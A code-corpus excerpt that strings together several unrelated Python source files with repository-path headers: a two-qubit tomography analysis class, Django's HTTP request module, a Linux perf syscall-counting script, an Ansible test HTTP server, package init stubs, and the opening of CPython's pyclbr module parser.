self.timestamp = timestamp
self.fig_format = fig_format
# q0 == D2
self.q0_label = q0_label
# q1 == A
self.q1_label = q1_label
self.n_states = 2 ** 2
self.ma_obj = ma.MeasurementAnalysis(auto=False, label=label,
timestamp=timestamp)
self.ma_obj.get_naming_and_values()
# self.get_naming_and_values()
# hard coded number of segments for a 2 qubit state tomography
# constraint imposed by UHFLI
# self.nr_segments = 16
# self.exp_name = os.path.split(self.folder)[-1][7:]
avg_h1 = self.ma_obj.measured_values[0]
avg_h2 = self.ma_obj.measured_values[1]
avg_h12 = self.ma_obj.measured_values[2]
#this should be implemented with a flag
#but
h1_00 = np.mean(avg_h1[36:36+7])
h1_01 = np.mean(avg_h1[43:43+7])
h1_10 = np.mean(avg_h1[50:50+7])
h1_11 = np.mean(avg_h1[57:])
h2_00 = np.mean(avg_h2[36:36+7])
h2_01 = np.mean(avg_h2[43:43+7])
h2_10 = np.mean(avg_h2[50:50+7])
h2_11 = np.mean(avg_h2[57:])
h12_00 = np.mean(avg_h12[36:36+7])
h12_01 = np.mean(avg_h12[43:43+7])
h12_10 = np.mean(avg_h12[50:50+7])
h12_11 = np.mean(avg_h12[57:])
mean_h1 = (h1_00+h1_10+h1_01+h1_11)/4
mean_h2 = (h2_00+h2_01+h2_10+h2_11)/4
mean_h12 = (h12_00+h12_11+h12_01+h12_10)/4
#subtract beta 0 from all measurements
#rescale them
avg_h1 -= mean_h1
avg_h2 -= mean_h2
avg_h12 -= mean_h12
scale_h1 = (h1_00+h1_10-h1_01-h1_11)/4
scale_h2 = (h2_00+h2_01-h2_10-h2_11)/4
scale_h12 = (h12_00+h12_11-h12_01-h12_10)/4
avg_h1 = (avg_h1)/scale_h1
avg_h2 = (avg_h2)/scale_h2
avg_h12 = (avg_h12)/scale_h12
#The averages have been redefined so redefine the cal terms
h1_00 = np.mean(avg_h1[36:36+7])
h1_01 = np.mean(avg_h1[43:43+7])
h1_10 = np.mean(avg_h1[50:50+7])
h1_11 = np.mean(avg_h1[57:])
h2_00 = np.mean(avg_h2[36:36+7])
h2_01 = np.mean(avg_h2[43:43+7])
h2_10 = np.mean(avg_h2[50:50+7])
h2_11 = np.mean(avg_h2[57:])
h12_00 = np.mean(avg_h12[36:36+7])
h12_01 = np.mean(avg_h12[43:43+7])
h12_10 = np.mean(avg_h12[50:50+7])
h12_11 = np.mean(avg_h12[57:])
measurement_channel_1 = np.array([avg_h1[0],avg_h1[1],avg_h1[7],avg_h1[8],avg_h1[14],avg_h1[21],avg_h1[28],avg_h1[35]])
measurement_channel_2 = np.array([avg_h2[0],avg_h2[1],avg_h2[7],avg_h2[8],avg_h2[14],avg_h2[21],avg_h2[28],avg_h2[35]])
measurement_channel_3 = np.array([avg_h12[0],avg_h12[1],avg_h12[7],avg_h12[8],avg_h12[14],avg_h12[21],avg_h12[28],avg_h12[35]])
self.measurements_tomo = np.array([measurement_channel_1,measurement_channel_2,measurement_channel_3]).flatten()
# print(self.measurements_tomo)
# print(len(self.measurements_tomo))
# 108 x 1
# get the calibration points by averaging over the five measurements
# taken knowing the initial state we put in
self.measurements_cal=np.array([h1_00, h1_01, h1_10, h1_11, h2_00, h2_01, h2_10, h2_11, h12_00, h12_01, h12_10, h12_11])
def _calibrate_betas(self):
"""
calculates betas from calibration points for the initial measurement
operator
Betas are ordered by B0 -> II B1 -> IZ etc(binary counting)
<0|Z|0> = 1, <1|Z|1> = -1
Keyword arguments:
measurements_cal --- array(2 ** n_qubits) should be ordered
correctly (00, 01, 10, 11) for 2 qubits
"""
cal_matrix = np.zeros((self.n_states, self.n_states))
# get the coefficient matrix for the betas
for i in range(self.n_states):
for j in range(self.n_states):
# perform bitwise AND and count the resulting 1s
cal_matrix[i, j] = (-1)**(bin((i & j)).count("1"))
# invert solve the simple system of equations
# print(cal_matrix)
# print(np.linalg.inv(cal_matrix))
self.betas = np.zeros(12)
# print(self.measurements_cal[0:4])
self.betas[0:4] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[0:4])
self.betas_up = self.betas[0:4]
self.betas[4:8] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[4:8])
self.betas_p = self.betas[4:8]
self.betas[8:] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[8:12])
self.betas_pp = self.betas[8:]
return self.betas
def assemble_M_matrix_single_block(self, beta_array):
M_matrix_single_block_row_1 = np.array([beta_array[1],
beta_array[2], beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_2 = np.array([-1*beta_array[1],
beta_array[2],
-1*beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_3 = np.array([beta_array[1],
-1*beta_array[2],
-1*beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_4 = np.array([-1*beta_array[1],
-1*beta_array[2],
beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_5 = np.array([0, 0, 0, -beta_array[1],
-beta_array[2],
beta_array[3], 0, 0, 0])
M_matrix_single_block_row_6 = np.array([0, 0, 0,
beta_array[1],
beta_array[2],
beta_array[3],
0, 0, 0])
M_matrix_single_block_row_7 = np.array([0, 0,
0, 0, 0, 0, beta_array[1],
beta_array[2],
beta_array[3]])
M_matrix_single_block_row_8 = np.array([0, 0, 0, 0,
0, 0, -beta_array[1],
-beta_array[2],
beta_array[3]])
M_matrix_single_block = np.vstack((M_matrix_single_block_row_1,
M_matrix_single_block_row_2,
M_matrix_single_block_row_3,
M_matrix_single_block_row_4,
M_matrix_single_block_row_5,
M_matrix_single_block_row_6,
M_matrix_single_block_row_7,
M_matrix_single_block_row_8))
M_matrix_single_block = M_matrix_single_block.reshape(8, 9)
return M_matrix_single_block
def assemble_M_matrix(self):
Block1 = self.assemble_M_matrix_single_block(self.betas_up)
Block2 = self.assemble_M_matrix_single_block(self.betas_p)
Block3 = self.assemble_M_matrix_single_block(self.betas_pp)
self.M_matrix = np.vstack((Block1, Block2, Block3)).reshape(24, 9)
return self.M_matrix
def invert_M_matrix(self):
self.inverse_matrix = np.linalg.pinv(self.M_matrix)
return self.inverse_matrix
def execute_error_signalling(self, ev):
II = (ev[0] - ev[3])/(1 - ev[3])
IZ = (ev[1] - ev[2])/(1 - ev[3])
ZI = (ev[1] - ev[2])/(1 - ev[3])
ZZ = (ev[3] - ev[0])/(1 - ev[3])
XX = (ev[4] + ev[5])/(1 - ev[3])
YY = (ev[4] + ev[5])/(1 - ev[3])
ev_error_signalling = np.array([II, IZ, ZI, ZZ, XX, YY])
return ev_error_signalling
def execute_expectation_value_calculation_traceone(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.inverse_matrix = np.linalg.pinv(self.M_matrix)
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([1,
self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[5],
self.expect_values[8]])
return expect_values_VQE
def execute_expectation_value_calculation_T1signaling(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.inverse_matrix = np.linalg.pinv(self.M_matrix[:, 1:])
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([1,
self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[5],
self.expect_values[8]])
expect_values_VQE = self.execute_error_signalling(expect_values_VQE)
return expect_values_VQE
|
c0hen/django-venv
|
refs/heads/master
|
lib/python3.4/site-packages/django/http/request.py
|
23
|
from __future__ import unicode_literals
import copy
import re
import sys
from io import BytesIO
from itertools import chain
from django.conf import settings
from django.core import signing
from django.core.exceptions import (
DisallowedHost, ImproperlyConfigured, RequestDataTooBig,
)
from django.core.files import uploadhandler
from django.http.multipartparser import MultiPartParser, MultiPartParserError
from django.utils import six
from django.utils.datastructures import ImmutableList, MultiValueDict
from django.utils.encoding import (
escape_uri_path, force_bytes, force_str, force_text, iri_to_uri,
)
from django.utils.http import is_same_domain, limited_parse_qsl
from django.utils.six.moves.urllib.parse import (
quote, urlencode, urljoin, urlsplit,
)
RAISE_ERROR = object()
host_validation_re = re.compile(r"^([a-z0-9.-]+|\[[a-f0-9]*:[a-f0-9:]+\])(:\d+)?$")
class UnreadablePostError(IOError):
pass
class RawPostDataException(Exception):
"""
You cannot access raw_post_data from a request that has
multipart/* POST data if it has been accessed via POST,
FILES, etc..
"""
pass
class HttpRequest(object):
"""A basic HTTP request."""
# The encoding used in GET/POST dicts. None means use default setting.
_encoding = None
_upload_handlers = []
def __init__(self):
# WARNING: The `WSGIRequest` subclass doesn't call `super`.
# Any variable assignment made here should also happen in
# `WSGIRequest.__init__()`.
self.GET = QueryDict(mutable=True)
self.POST = QueryDict(mutable=True)
self.COOKIES = {}
self.META = {}
self.FILES = MultiValueDict()
self.path = ''
self.path_info = ''
self.method = None
self.resolver_match = None
self._post_parse_error = False
self.content_type = None
self.content_params = None
def __repr__(self):
if self.method is None or not self.get_full_path():
return force_str('<%s>' % self.__class__.__name__)
return force_str(
'<%s: %s %r>' % (self.__class__.__name__, self.method, force_str(self.get_full_path()))
)
def _get_raw_host(self):
"""
Return the HTTP host using the environment or request headers. Skip
allowed hosts protection, so may return an insecure host.
"""
# We try three options, in order of decreasing preference.
if settings.USE_X_FORWARDED_HOST and (
'HTTP_X_FORWARDED_HOST' in self.META):
host = self.META['HTTP_X_FORWARDED_HOST']
elif 'HTTP_HOST' in self.META:
host = self.META['HTTP_HOST']
else:
# Reconstruct the host using the algorithm from PEP 333.
host = self.META['SERVER_NAME']
server_port = self.get_port()
if server_port != ('443' if self.is_secure() else '80'):
host = '%s:%s' % (host, server_port)
return host
def get_host(self):
"""Return the HTTP host using the environment or request headers."""
host = self._get_raw_host()
# Allow variants of localhost if ALLOWED_HOSTS is empty and DEBUG=True.
allowed_hosts = settings.ALLOWED_HOSTS
if settings.DEBUG and not allowed_hosts:
allowed_hosts = ['localhost', '127.0.0.1', '[::1]']
domain, port = split_domain_port(host)
if domain and validate_host(domain, allowed_hosts):
return host
else:
msg = "Invalid HTTP_HOST header: %r." % host
if domain:
msg += " You may need to add %r to ALLOWED_HOSTS." % domain
else:
msg += " The domain name provided is not valid according to RFC 1034/1035."
raise DisallowedHost(msg)
def get_port(self):
"""Return the port number for the request as a string."""
if settings.USE_X_FORWARDED_PORT and 'HTTP_X_FORWARDED_PORT' in self.META:
port = self.META['HTTP_X_FORWARDED_PORT']
else:
port = self.META['SERVER_PORT']
return str(port)
def get_full_path(self, force_append_slash=False):
# RFC 3986 requires query string arguments to be in the ASCII range.
# Rather than crash if this doesn't happen, we encode defensively.
return '%s%s%s' % (
escape_uri_path(self.path),
'/' if force_append_slash and not self.path.endswith('/') else '',
('?' + iri_to_uri(self.META.get('QUERY_STRING', ''))) if self.META.get('QUERY_STRING', '') else ''
)
def get_signed_cookie(self, key, default=RAISE_ERROR, salt='', max_age=None):
"""
Attempts to return a signed cookie. If the signature fails or the
cookie has expired, raises an exception... unless you provide the
default argument in which case that value will be returned instead.
"""
try:
cookie_value = self.COOKIES[key]
except KeyError:
if default is not RAISE_ERROR:
return default
else:
raise
try:
value = signing.get_cookie_signer(salt=key + salt).unsign(
cookie_value, max_age=max_age)
except signing.BadSignature:
if default is not RAISE_ERROR:
return default
else:
raise
return value
def get_raw_uri(self):
"""
Return an absolute URI from variables available in this request. Skip
allowed hosts protection, so may return insecure URI.
"""
return '{scheme}://{host}{path}'.format(
scheme=self.scheme,
host=self._get_raw_host(),
path=self.get_full_path(),
)
def build_absolute_uri(self, location=None):
"""
Builds an absolute URI from the location and the variables available in
this request. If no ``location`` is specified, the absolute URI is
built on ``request.get_full_path()``. Anyway, if the location is
absolute, it is simply converted to an RFC 3987 compliant URI and
returned and if location is relative or is scheme-relative (i.e.,
``//example.com/``), it is urljoined to a base URL constructed from the
request variables.
"""
if location is None:
# Make it an absolute url (but schemeless and domainless) for the
# edge case that the path starts with '//'.
location = '//%s' % self.get_full_path()
bits = urlsplit(location)
if not (bits.scheme and bits.netloc):
current_uri = '{scheme}://{host}{path}'.format(scheme=self.scheme,
host=self.get_host(),
path=self.path)
# Join the constructed URL with the provided location, which will
# allow the provided ``location`` to apply query strings to the
# base path as well as override the host, if it begins with //
location = urljoin(current_uri, location)
return iri_to_uri(location)
def _get_scheme(self):
"""
Hook for subclasses like WSGIRequest to implement. Returns 'http' by
default.
"""
return 'http'
@property
def scheme(self):
if settings.SECURE_PROXY_SSL_HEADER:
try:
header, value = settings.SECURE_PROXY_SSL_HEADER
except ValueError:
raise ImproperlyConfigured(
'The SECURE_PROXY_SSL_HEADER setting must be a tuple containing two values.'
)
if self.META.get(header) == value:
return 'https'
return self._get_scheme()
def is_secure(self):
return self.scheme == 'https'
def is_ajax(self):
return self.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest'
@property
def encoding(self):
return self._encoding
@encoding.setter
def encoding(self, val):
"""
Sets the encoding used for GET/POST accesses. If the GET or POST
dictionary has already been created, it is removed and recreated on the
next access (so that it is decoded correctly).
"""
self._encoding = val
if hasattr(self, '_get'):
del self._get
if hasattr(self, '_post'):
del self._post
def _initialize_handlers(self):
self._upload_handlers = [uploadhandler.load_handler(handler, self)
for handler in settings.FILE_UPLOAD_HANDLERS]
@property
def upload_handlers(self):
if not self._upload_handlers:
# If there are no upload handlers defined, initialize them from settings.
self._initialize_handlers()
return self._upload_handlers
@upload_handlers.setter
def upload_handlers(self, upload_handlers):
if hasattr(self, '_files'):
raise AttributeError("You cannot set the upload handlers after the upload has been processed.")
self._upload_handlers = upload_handlers
def parse_file_upload(self, META, post_data):
"""Returns a tuple of (POST QueryDict, FILES MultiValueDict)."""
self.upload_handlers = ImmutableList(
self.upload_handlers,
warning="You cannot alter upload handlers after the upload has been processed."
)
parser = MultiPartParser(META, post_data, self.upload_handlers, self.encoding)
return parser.parse()
@property
def body(self):
if not hasattr(self, '_body'):
if self._read_started:
raise RawPostDataException("You cannot access body after reading from request's data stream")
# Limit the maximum request data size that will be handled in-memory.
if (settings.DATA_UPLOAD_MAX_MEMORY_SIZE is not None and
int(self.META.get('CONTENT_LENGTH') or 0) > settings.DATA_UPLOAD_MAX_MEMORY_SIZE):
raise RequestDataTooBig('Request body exceeded settings.DATA_UPLOAD_MAX_MEMORY_SIZE.')
try:
self._body = self.read()
except IOError as e:
six.reraise(UnreadablePostError, UnreadablePostError(*e.args), sys.exc_info()[2])
self._stream = BytesIO(self._body)
return self._body
def _mark_post_parse_error(self):
self._post = QueryDict()
self._files = MultiValueDict()
self._post_parse_error = True
def _load_post_and_files(self):
"""Populate self._post and self._files if the content-type is a form type"""
if self.method != 'POST':
self._post, self._files = QueryDict(encoding=self._encoding), MultiValueDict()
return
if self._read_started and not hasattr(self, '_body'):
self._mark_post_parse_error()
return
if self.content_type == 'multipart/form-data':
if hasattr(self, '_body'):
# Use already read data
data = BytesIO(self._body)
else:
data = self
try:
self._post, self._files = self.parse_file_upload(self.META, data)
except MultiPartParserError:
# An error occurred while parsing POST data. Since when
# formatting the error the request handler might access
# self.POST, set self._post and self._file to prevent
# attempts to parse POST data again.
# Mark that an error occurred. This allows self.__repr__ to
# be explicit about it instead of simply representing an
# empty POST
self._mark_post_parse_error()
raise
elif self.content_type == 'application/x-www-form-urlencoded':
self._post, self._files = QueryDict(self.body, encoding=self._encoding), MultiValueDict()
else:
self._post, self._files = QueryDict(encoding=self._encoding), MultiValueDict()
def close(self):
if hasattr(self, '_files'):
for f in chain.from_iterable(l[1] for l in self._files.lists()):
f.close()
# File-like and iterator interface.
#
# Expects self._stream to be set to an appropriate source of bytes by
# a corresponding request subclass (e.g. WSGIRequest).
# Also when request data has already been read by request.POST or
# request.body, self._stream points to a BytesIO instance
# containing that data.
def read(self, *args, **kwargs):
self._read_started = True
try:
return self._stream.read(*args, **kwargs)
except IOError as e:
six.reraise(UnreadablePostError, UnreadablePostError(*e.args), sys.exc_info()[2])
def readline(self, *args, **kwargs):
self._read_started = True
try:
return self._stream.readline(*args, **kwargs)
except IOError as e:
six.reraise(UnreadablePostError, UnreadablePostError(*e.args), sys.exc_info()[2])
def xreadlines(self):
while True:
buf = self.readline()
if not buf:
break
yield buf
__iter__ = xreadlines
def readlines(self):
return list(iter(self))
class QueryDict(MultiValueDict):
"""
A specialized MultiValueDict which represents a query string.
A QueryDict can be used to represent GET or POST data. It subclasses
MultiValueDict since keys in such data can be repeated, for instance
in the data from a form with a <select multiple> field.
By default QueryDicts are immutable, though the copy() method
will always return a mutable copy.
Both keys and values set on this class are converted from the given encoding
(DEFAULT_CHARSET by default) to unicode.
"""
# These are both reset in __init__, but is specified here at the class
# level so that unpickling will have valid values
_mutable = True
_encoding = None
def __init__(self, query_string=None, mutable=False, encoding=None):
super(QueryDict, self).__init__()
if not encoding:
encoding = settings.DEFAULT_CHARSET
self.encoding = encoding
query_string = query_string or ''
parse_qsl_kwargs = {
'keep_blank_values': True,
'fields_limit': settings.DATA_UPLOAD_MAX_NUMBER_FIELDS,
'encoding': encoding,
}
if six.PY3:
if isinstance(query_string, bytes):
# query_string normally contains URL-encoded data, a subset of ASCII.
try:
query_string = query_string.decode(encoding)
except UnicodeDecodeError:
# ... but some user agents are misbehaving :-(
query_string = query_string.decode('iso-8859-1')
for key, value in limited_parse_qsl(query_string, **parse_qsl_kwargs):
self.appendlist(key, value)
else:
for key, value in limited_parse_qsl(query_string, **parse_qsl_kwargs):
try:
value = value.decode(encoding)
except UnicodeDecodeError:
value = value.decode('iso-8859-1')
self.appendlist(force_text(key, encoding, errors='replace'),
value)
self._mutable = mutable
@property
def encoding(self):
if self._encoding is None:
self._encoding = settings.DEFAULT_CHARSET
return self._encoding
@encoding.setter
def encoding(self, value):
self._encoding = value
def _assert_mutable(self):
if not self._mutable:
raise AttributeError("This QueryDict instance is immutable")
def __setitem__(self, key, value):
self._assert_mutable()
key = bytes_to_text(key, self.encoding)
value = bytes_to_text(value, self.encoding)
super(QueryDict, self).__setitem__(key, value)
def __delitem__(self, key):
self._assert_mutable()
super(QueryDict, self).__delitem__(key)
def __copy__(self):
result = self.__class__('', mutable=True, encoding=self.encoding)
for key, value in six.iterlists(self):
result.setlist(key, value)
return result
def __deepcopy__(self, memo):
result = self.__class__('', mutable=True, encoding=self.encoding)
memo[id(self)] = result
for key, value in six.iterlists(self):
result.setlist(copy.deepcopy(key, memo), copy.deepcopy(value, memo))
return result
def setlist(self, key, list_):
self._assert_mutable()
key = bytes_to_text(key, self.encoding)
list_ = [bytes_to_text(elt, self.encoding) for elt in list_]
super(QueryDict, self).setlist(key, list_)
def setlistdefault(self, key, default_list=None):
self._assert_mutable()
return super(QueryDict, self).setlistdefault(key, default_list)
def appendlist(self, key, value):
self._assert_mutable()
key = bytes_to_text(key, self.encoding)
value = bytes_to_text(value, self.encoding)
super(QueryDict, self).appendlist(key, value)
def pop(self, key, *args):
self._assert_mutable()
return super(QueryDict, self).pop(key, *args)
def popitem(self):
self._assert_mutable()
return super(QueryDict, self).popitem()
def clear(self):
self._assert_mutable()
super(QueryDict, self).clear()
def setdefault(self, key, default=None):
self._assert_mutable()
key = bytes_to_text(key, self.encoding)
default = bytes_to_text(default, self.encoding)
return super(QueryDict, self).setdefault(key, default)
def copy(self):
"""Returns a mutable copy of this object."""
return self.__deepcopy__({})
def urlencode(self, safe=None):
"""
Returns an encoded string of all query string arguments.
:arg safe: Used to specify characters which do not require quoting, for
example::
>>> q = QueryDict(mutable=True)
>>> q['next'] = '/a&b/'
>>> q.urlencode()
'next=%2Fa%26b%2F'
>>> q.urlencode(safe='/')
'next=/a%26b/'
"""
output = []
if safe:
safe = force_bytes(safe, self.encoding)
def encode(k, v):
return '%s=%s' % ((quote(k, safe), quote(v, safe)))
else:
def encode(k, v):
return urlencode({k: v})
for k, list_ in self.lists():
k = force_bytes(k, self.encoding)
output.extend(encode(k, force_bytes(v, self.encoding))
for v in list_)
return '&'.join(output)
# It's neither necessary nor appropriate to use
# django.utils.encoding.smart_text for parsing URLs and form inputs. Thus,
# this slightly more restricted function, used by QueryDict.
def bytes_to_text(s, encoding):
"""
Converts basestring objects to unicode, using the given encoding. Illegally
encoded input characters are replaced with Unicode "unknown" codepoint
(\ufffd).
Returns any non-basestring objects without change.
"""
if isinstance(s, bytes):
return six.text_type(s, encoding, 'replace')
else:
return s
def split_domain_port(host):
"""
Return a (domain, port) tuple from a given host.
Returned domain is lower-cased. If the host is invalid, the domain will be
empty.
"""
host = host.lower()
if not host_validation_re.match(host):
return '', ''
if host[-1] == ']':
# It's an IPv6 address without a port.
return host, ''
bits = host.rsplit(':', 1)
if len(bits) == 2:
return tuple(bits)
return bits[0], ''
def validate_host(host, allowed_hosts):
"""
Validate the given host for this site.
Check that the host looks valid and matches a host or host pattern in the
given list of ``allowed_hosts``. Any pattern beginning with a period
matches a domain and all its subdomains (e.g. ``.example.com`` matches
``example.com`` and any subdomain), ``*`` matches anything, and anything
else must match exactly.
Note: This function assumes that the given host is lower-cased and has
already had the port, if any, stripped off.
Return ``True`` for a valid host, ``False`` otherwise.
"""
host = host[:-1] if host.endswith('.') else host
for pattern in allowed_hosts:
if pattern == '*' or is_same_domain(host, pattern):
return True
return False
|
Yukarumya/Yukarum-Redfoxes
|
refs/heads/master
|
testing/web-platform/tests/tools/serve/__init__.py
|
458
|
import serve
|
DevriesL/HeroQLTE_ImageBreaker
|
refs/heads/master
|
tools/perf/scripts/python/sctop.py
|
1996
|
# system call top
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Periodically displays system-wide system call totals, broken down by
# syscall. If a [comm] arg is specified, only syscalls called by
# [comm] are displayed. If an [interval] arg is specified, the display
# will be refreshed every [interval] seconds. The default interval is
# 3 seconds.
import os, sys, thread, time
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s sctop.py [comm] [interval]\n";
for_comm = None
default_interval = 3
interval = default_interval
if len(sys.argv) > 3:
sys.exit(usage)
if len(sys.argv) > 2:
for_comm = sys.argv[1]
interval = int(sys.argv[2])
elif len(sys.argv) > 1:
try:
interval = int(sys.argv[1])
except ValueError:
for_comm = sys.argv[1]
interval = default_interval
syscalls = autodict()
def trace_begin():
thread.start_new_thread(print_syscall_totals, (interval,))
pass
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
raw_syscalls__sys_enter(**locals())
def print_syscall_totals(interval):
while 1:
clear_term()
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
try:
print "%-40s %10d\n" % (syscall_name(id), val),
except TypeError:
pass
syscalls.clear()
time.sleep(interval)
|
dlazz/ansible
|
refs/heads/devel
|
test/integration/targets/wait_for/files/testserver.py
|
222
|
import sys
if __name__ == '__main__':
if sys.version_info[0] >= 3:
import http.server
import socketserver
PORT = int(sys.argv[1])
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
httpd.serve_forever()
else:
import mimetypes
mimetypes.init()
mimetypes.add_type('application/json', '.json')
import SimpleHTTPServer
SimpleHTTPServer.test()
|
Fkawala/gcloud-python
|
refs/heads/master
|
bigquery/google/__init__.py
|
194
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import pkg_resources
pkg_resources.declare_namespace(__name__)
except ImportError:
import pkgutil
__path__ = pkgutil.extend_path(__path__, __name__)
|
fighterCui/L4ReFiascoOC
|
refs/heads/master
|
l4/pkg/python/contrib/Lib/pyclbr.py
|
182
|
"""Parse a Python module and describe its classes and methods.
Parse enough of a Python file to recognize imports and class and
method definitions, and to find out the superclasses of a class.
The interface consists of a single function:
readmodule_ex(module [, path])
where module is the name of a Python module, and path is an optional
list of directories where the module is to be searched. If present,
path is prepended to the system search path sys.path. The return
value is a dictionary. The keys of the dictionary are the names of
the classes defined in the module (including classes that are defined
via the from XXX import YYY construct). The values are class
instances of the class Class defined here. One special key/value pair
is present for packages: the key '__path__' has a list as its value
which contains the package search path.
A class is described by the class Class in this module. Instances
of this class have the following instance variables:
module -- the module name
name -- the name of the class
super -- a list of super classes (Class instances)
methods -- a dictionary of methods
file -- the file in which the class was defined
lineno -- the line in the file on which the class statement occurred
The dictionary of methods uses the method names as keys and the line
numbers on which the method was defined as values.
If the name of a super class is not recognized, the corresponding
entry in the list of super classes is not a class instance but a
string giving the name of the super class. Since import statements
are recognized and imported modules are scanned as well, this
shouldn't happen often.
A function is described by the class Function in this module.
Instances of this class have the following instance variables:
module -- the module name
name -- the name of the class
file -- the file in which the class was defined
lineno -- the line in the file on which the class statement occurred
"""
import sys
import imp
import tokenize
from token import NAME, DEDENT, OP
from operator import itemgetter
__all__ = ["readmodule", "readmodule_ex", "Class", "Function"]
_modules = {} # cache of modules we've seen
# each Python class is represented by an instance of this class
class Class:
'''Class to represent a Python class.'''
def __init__(self, module, name, super, file, lineno):
self.module = module
self.name = name
if super is None:
super = []
self.super = super
self.methods = {}
self.file = file
self.lineno = lineno
def _addmethod(self, name, lineno):
self.methods[name] = lineno
class Function:
'''Class to represent a top-level Python function'''
def __init__(self, module, name, file, lineno):
self.module = module
self.name = name
self.file = file
self.lineno = lineno
def readmodule(module, path=None):
'''Backwards compatible interface.
Call readmodule_ex() and then only keep Class objects from the
resulting dictionary.'''
res = {}
for key, value in _readmodule(module, path or []).items():
if isinstance(value, Class):
res[key] = value
return res
def readmodule_ex(module, path=None):
'''Read a module file and return a dictionary of classes.
Search for MODULE in PATH and sys.path, read and parse the
module and return a dictionary with one entry for each class
found in the module.
'''
return _readmodule(module, path or [])
def _readmodule(module, path, inpackage=None):
'''Do the hard work for readmodule[_ex].
If INPACKAGE is given, it must be the dotted name of the package in
which we are searching for a submodule, and then PATH must be the
package search path; otherwise, we are searching for a top-level
module, and PATH is combined with sys.path.
'''
# Compute the full module name (prepending inpackage if set)
if inpackage is not None:
fullmodule = "%s.%s" % (inpackage, module)
else:
fullmodule = module
# Check in the cache
if fullmodule in _modules:
return _modules[fullmodule]
# Initialize the dict for this module's contents
dict = {}
# Check if it is a built-in module; we don't do much for these
if module in sys.builtin_module_names and inpackage is None:
_modules[module] = dict
return dict
# Check for a dotted module name
i = module.rfind('.')
if i >= 0:
package = module[:i]
submodule = module[i+1:]
parent = _readmodule(package, path, inpackage)
if inpackage is not None:
package = "%s.%s" % (inpackage, package)
return _readmodule(submodule, parent['__path__'], package)
# Search the path for the module
f = None
if inpackage is not None:
f, fname, (_s, _m, ty) = imp.find_module(module, path)
else:
f, fname, (_s, _m, ty) = imp.find_module(module, path + sys.path)
if ty == imp.PKG_DIRECTORY:
dict['__path__'] = [fname]
path = [fname] + path
f, fname, (_s, _m, ty) = imp.find_module('__init__', [fname])
_modules[fullmodule] = dict
if ty != imp.PY_SOURCE:
# not Python source, can't do anything with this module
f.close()
return dict
stack = [] # stack of (class, indent) pairs
g = tokenize.generate_tokens(f.readline)
try:
for tokentype, token, start, _end, _line in g:
if tokentype == DEDENT:
lineno, thisindent = start
# close nested classes and defs
while stack and stack[-1][1] >= thisindent:
del stack[-1]
elif token == 'def':
lineno, thisindent = start
# close previous nested classes and defs
while stack and stack[-1][1] >= thisindent:
del stack[-1]
tokentype, meth_name, start = g.next()[0:3]
if tokentype != NAME:
continue # Syntax error
if stack:
cur_class = stack[-1][0]
if isinstance(cur_class, Class):
# it's a method
cur_class._addmethod(meth_name, lineno)
# else it's a nested def
else:
# it's a function
dict[meth_name] = Function(fullmodule, meth_name,
fname, lineno)
stack.append((None, thisindent)) # Marker for nested fns
elif token == 'class':
lineno, thisindent = start
# close previous nested classes and defs
while stack and stack[-1][1] >= thisindent:
del stack[-1]
tokentype, class_name, start = g.next()[0:3]
if tokentype != NAME:
continue # Syntax error
# parse what follows the class name
tokentype, token, start = g.next()[0:3]
inherit = None
if token == '(':
names = [] # List of superclasses
# there's a list of superclasses
level = 1
super = [] # Tokens making up current superclass
while True:
tokentype, token, start = g.next()[0:3]
if token in (')', ',') and level == 1:
n = "".join(super)
if n in dict:
# we know this super class
n = dict[n]
else:
c = n.split('.')
if len(c) > 1:
# super class is of the form
# module.class: look in module for
# class
m = c[-2]
c = c[-1]
if m in _modules:
d = _modules[m]
if c in d:
n = d[c]
names.append(n)
super = []
if token == '(':
level += 1
elif token == ')':
level -= 1
if level == 0:
break
elif token == ',' and level == 1:
pass
# only use NAME and OP (== dot) tokens for type name
elif tokentype in (NAME, OP) and level == 1:
super.append(token)
# expressions in the base list are not supported
inherit = names
cur_class = Class(fullmodule, class_name, inherit,
fname, lineno)
if not stack:
dict[class_name] = cur_class
stack.append((cur_class, thisindent))
